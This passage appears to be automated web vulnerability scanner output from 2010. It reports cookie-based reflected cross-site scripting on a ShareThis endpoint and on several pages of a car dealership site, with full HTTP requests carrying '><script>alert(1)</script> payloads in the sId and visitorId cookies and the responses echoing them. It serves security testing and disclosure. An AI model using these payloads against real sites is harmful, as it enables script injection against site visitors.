GET /getSegment.php?fpc=3e3577f-12cc309077b-2ca9e758-1&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.8977a5c7be5630214d328a2ac3111917.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==b3de5<script>alert(1)</script>f8789a7faf3
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Wed, 08 Dec 2010 00:30:17 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 Content-Length: 639
<html> <head><title>ShareThis Segmenter</title></head> <body> <script type="text/javascript"> var google_conversion_id = 1036609180; var google_conversion_language = "en"; var goo ...[SNIP]... <div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==b3de5<script>alert(1)</script>f8789a7faf3 userid: </div> ...[SNIP]...
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bba24'><script>alert(1)</script>4a0218b962f was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwbba24'><script>alert(1)</script>4a0218b962f;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:40 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=rrWYM13LTfVMnsHDSBzWTTGyQ6910mh0Jxnr2xc1J3gwQk2QH1JQ!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:40 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwbba24'><script>alert(1)</script>4a0218b962f; expires=Wednesday, 08-Dec-2010 08:14:40 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f65fc'><script>alert(1)</script>15a86c66cff was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf65fc'><script>alert(1)</script>15a86c66cff; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:19 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=nKLjM13T6ycGJR8JhqttXLGjDtTyfQ42sNcv5n6LVkylSl1khNHk!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf65fc'><script>alert(1)</script>15a86c66cff; expires=Friday, 07-Dec-2012 07:44:19 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:19 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67033'><script>alert(1)</script>694fe16996f was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ContactUsForm HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw67033'><script>alert(1)</script>694fe16996f;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:42 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=S4nmM13Ky0wYR9HyC9Wp6r1CQKtpMMbHQKN2jmnykTlZDJFRgTXS!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:42 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw67033'><script>alert(1)</script>694fe16996f; expires=Wednesday, 08-Dec-2010 08:14:42 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac93a'><script>alert(1)</script>d45b351a197 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ContactUsForm HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwac93a'><script>alert(1)</script>d45b351a197; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:23 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=nGMVM13XLfQyH1X3sZ1lrNbBgk1tlcJP4G4Z7qbycfMJQWPn3ThR!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwac93a'><script>alert(1)</script>d45b351a197; expires=Friday, 07-Dec-2012 07:44:23 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:23 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eae50'><script>alert(1)</script>7408415414f was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HomePage HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdweae50'><script>alert(1)</script>7408415414f;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:46 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=TNtJM13TRzqL0R0TlxhjLVH8nxwhff4ZGXWnW0XnNGZDQLX9p9mW!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:46 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdweae50'><script>alert(1)</script>7408415414f; expires=Wednesday, 08-Dec-2010 08:14:46 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47add'><script>alert(1)</script>3a0afa4204 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HomePage HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw47add'><script>alert(1)</script>3a0afa4204; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:20 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=YnJJM13JLK9YL1w2mJvTgq5XpJvQMprxwHxSVc2D0YqVhQs16q0F!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw47add'><script>alert(1)</script>3a0afa4204; expires=Friday, 07-Dec-2012 07:44:20 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:20 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98a30'><script>alert(1)</script>3924410583b was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HoursAndDirections HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw98a30'><script>alert(1)</script>3924410583b;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:36 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=jJ8JM13Gj0lmfG1Hhcht7Pmhfpr7094FLvcmKbt9FGQKR1JHQTPq!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:36 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw98a30'><script>alert(1)</script>3924410583b; expires=Wednesday, 08-Dec-2010 08:14:36 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78531'><script>alert(1)</script>3b4e7e6b4ad was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /HoursAndDirections HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw78531'><script>alert(1)</script>3b4e7e6b4ad; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:18 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=7Jv8M13S91YWJvtxC2HWKlpXGnQWGv1PVkpg0Rr2728rL9pvsb40!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw78531'><script>alert(1)</script>3b4e7e6b4ad; expires=Friday, 07-Dec-2012 07:44:18 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:18 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6d717'><script>alert(1)</script>eb92d5c6ce9 was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /PrivacyPolicy HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw6d717'><script>alert(1)</script>eb92d5c6ce9;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:49 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=JwGpM13R2W7w0y1JV74QMLThZ7g1hGbHh0WqhCqLKWgL1dDmlHL3!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:49 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw6d717'><script>alert(1)</script>eb92d5c6ce9; expires=Wednesday, 08-Dec-2010 08:14:49 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 953fd'><script>alert(1)</script>88ee0dc1f30 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /PrivacyPolicy HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw953fd'><script>alert(1)</script>88ee0dc1f30; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:31 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=pkRSM13fmnSLG9yYYWwlB1CmGMwyqWnTb9bQhJrJv5HTtQnZqwvF!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw953fd'><script>alert(1)</script>88ee0dc1f30; expires=Friday, 07-Dec-2012 07:44:31 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:31 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dab82'><script>alert(1)</script>709f9704f39 was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ServiceEvent_D HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwdab82'><script>alert(1)</script>709f9704f39;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:51 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=7RGNM13Tt1h3fG0qg8FLyn627vFRH85pQn9p7l5TxhXptjg01JJw!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:51 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwdab82'><script>alert(1)</script>709f9704f39; expires=Wednesday, 08-Dec-2010 08:14:51 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3089'><script>alert(1)</script>9fc8afd855e was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ServiceEvent_D HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf3089'><script>alert(1)</script>9fc8afd855e; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:33 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=WH2FM13B2vBPqpSZpzGjQ1y1mBycj5MW0nLqLVhSZ1m2s1syvp7w!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdwf3089'><script>alert(1)</script>9fc8afd855e; expires=Friday, 07-Dec-2012 07:44:33 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:33 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the sId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 276b4'><script>alert(1)</script>322ead584dd was submitted in the sId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
